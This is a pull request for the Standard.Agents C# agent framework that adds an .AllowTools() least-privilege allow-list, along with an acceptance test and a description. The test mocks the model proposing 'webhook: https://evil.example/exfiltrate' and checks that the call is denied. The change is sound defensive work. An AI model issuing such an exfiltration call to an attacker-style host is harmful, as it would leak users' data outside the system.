### PR TITLE
MEDIUM CLIENTS: Turn On Least-Privilege With .AllowTools()

### DIFF
--- a/Standard.Agents.Tests.Unit/Acceptance/ToolAllowListTests.cs
+++ b/Standard.Agents.Tests.Unit/Acceptance/ToolAllowListTests.cs
@@ -1,0 +1,56 @@
+// ---------------------------------------------------------------
+// Copyright (c) Hassan Habib All rights reserved.
+// Licensed under the The Standard Software License (TSSL)
+// ---------------------------------------------------------------
+
+using FluentAssertions;
+using Moq;
+using Standard.Agents.Brokers.Generators;
+using Standard.Agents.Brokers.Knowledges;
+using Standard.Agents.Brokers.Mcps;
+using Standard.Agents.Brokers.Memorys;
+using Standard.Agents.Brokers.Skills;
+using Xunit;
+
+namespace Standard.Agents.Tests.Unit.Acceptance;
+
+public class ToolAllowListTests
+{
+    [Fact]
+    public async Task ShouldDenyAToolThatIsNotOnTheAllowListEndToEndAsync()
+    {
+        // given
+        var generator = new Mock<IGeneratorBroker>();
+        generator.Setup(broker =>
+            broker.GenerateAsync(It.IsAny<string>(), It.IsAny<string>()))
+                .ReturnsAsync("ACTION: webhook: https://evil.example/exfiltrate");
+
+        var mcp = new Mock<IMcpBroker>();
+
+        var skills = new Mock<ISkillBroker>();
+        skills.Setup(broker => broker.SelectSkillsAsync()).ReturnsAsync(string.Empty);
+        var memory = new Mock<IMemoryBroker>();
+        memory.Setup(broker => broker.SelectMemoriesAsync()).ReturnsAsync([]);
+        var knowledge = new Mock<IKnowledgeBroker>();
+        knowledge.Setup(broker => broker.SelectKnowledgeAsync(It.IsAny<string>())).ReturnsAsync([]);
+
+        var agent = new StandardAgent()
+            .UseGenerator(generator.Object)
+            .UseSkills(skills.Object)
+            .UseMemory(memory.Object)
+            .UseKnowledge(knowledge.Object)
+            .UseMcp(mcp.Object)
+            .MaxTurns(1)
+            .AllowTools("calculator");
+
+        // when — the brain proposes a tool outside the allow-list
+        string answer = await agent.ProcessPromptAsync("call the webhook");
+
+        // then — it is denied at the perimeter, and no external tool is ever invoked
+        answer.Should().Contain("not permitted");
+
+        mcp.Verify(broker =>
+            broker.CallAsync(It.IsAny<string>(), It.IsAny<string>()),
+                Times.Never);
+    }
+}

--- a/Standard.Agents/StandardAgent.cs
+++ b/Standard.Agents/StandardAgent.cs
@@ -47,6 +47,7 @@ public sealed partial class StandardAgent : IAgent
     private string logPath = string.Empty;
     private string auditPath = string.Empty;
     private IEnumerable<RedactionRule>? redactionRules;
+    private IEnumerable<string>? allowedTools;
     private TraceVerbosity traceVerbosity = TraceVerbosity.Full;
     private string memoryPath = "memory.txt";
     private int maxTurns = 7;
@@ -357,6 +358,17 @@ public sealed partial class StandardAgent : IAgent
     /// <returns>The same agent, so calls can be chained.</returns>
     public StandardAgent Redact() =>
         Set(() => this.redactionRules = RedactionRules.Default);
+
+    /// <summary>
+    /// Restricts the agent to a <b>least-privilege</b> set of tools: the brain may still propose any
+    /// tool, but only those named here are allowed to run — anything else is denied at the Direction
+    /// perimeter before it executes, fed back so the agent can choose a permitted path. Off by default
+    /// (no restriction). The allow-list is Data. Matching is case-insensitive.
+    /// </summary>
+    /// <param name="toolNames">The only tool names this agent is permitted to run.</param>
+    /// <returns>The same agent, so calls can be chained.</returns>
+    public StandardAgent AllowTools(params string[] toolNames) =>
+        Set(() => this.allowedTools = toolNames);
 
     /// <summary>
     /// Caps how many Recall→Think→Act turns a single prompt may take before the agent stops —

--- a/Standard.Agents/StandardAgent.cs
+++ b/Standard.Agents/StandardAgent.cs
@@ -633,7 +633,8 @@ public sealed partial class StandardAgent : IAgent
             new InternalToolService(toolBroker, logging),
             new ExternalToolService(mcp, logging),
             new ReturnService(logging),
-            logging);
+            logging,
+            this.allowedTools);
 
         return new AgentCoordinationService(data, decision, direction, logging, this.maxTurns);
     }


### PR DESCRIPTION
Pillar 3 — exposes the Direction RBAC gate (PR #209) as one appliance line:

```csharp
new StandardAgent()
    .UseGenerator(brain)
    .Tool("calculator", ...)
    .AllowTools("calculator");   // the brain may propose anything; only these run
```

`.AllowTools(...)` wires the allow-list (Data) into the Direction orchestration. Off by default (no restriction), so nothing changes unless you opt in.

End-to-end acceptance: the brain proposes `ACTION: webhook: …`, the agent is restricted to `calculator`, and the run comes back **"not permitted"** with the external tool broker **never** invoked.

With #206–#209, **Pillar 3 (the security perimeter) is substantially in place**: PII never reaches the brain in the clear (buffered + streaming), and tools run under least-privilege. Remaining follow-ons ride the same seams: the Judge/verifier redaction boundary, and jurisdiction/location-scoped tool policy.

FAIL→PASS: `ShouldDenyAToolThatIsNotOnTheAllowListEndToEndAsync` (genuine FAIL shown with Compose unwired). Category: MEDIUM CLIENTS. 279 unit + 10/10 conformance green.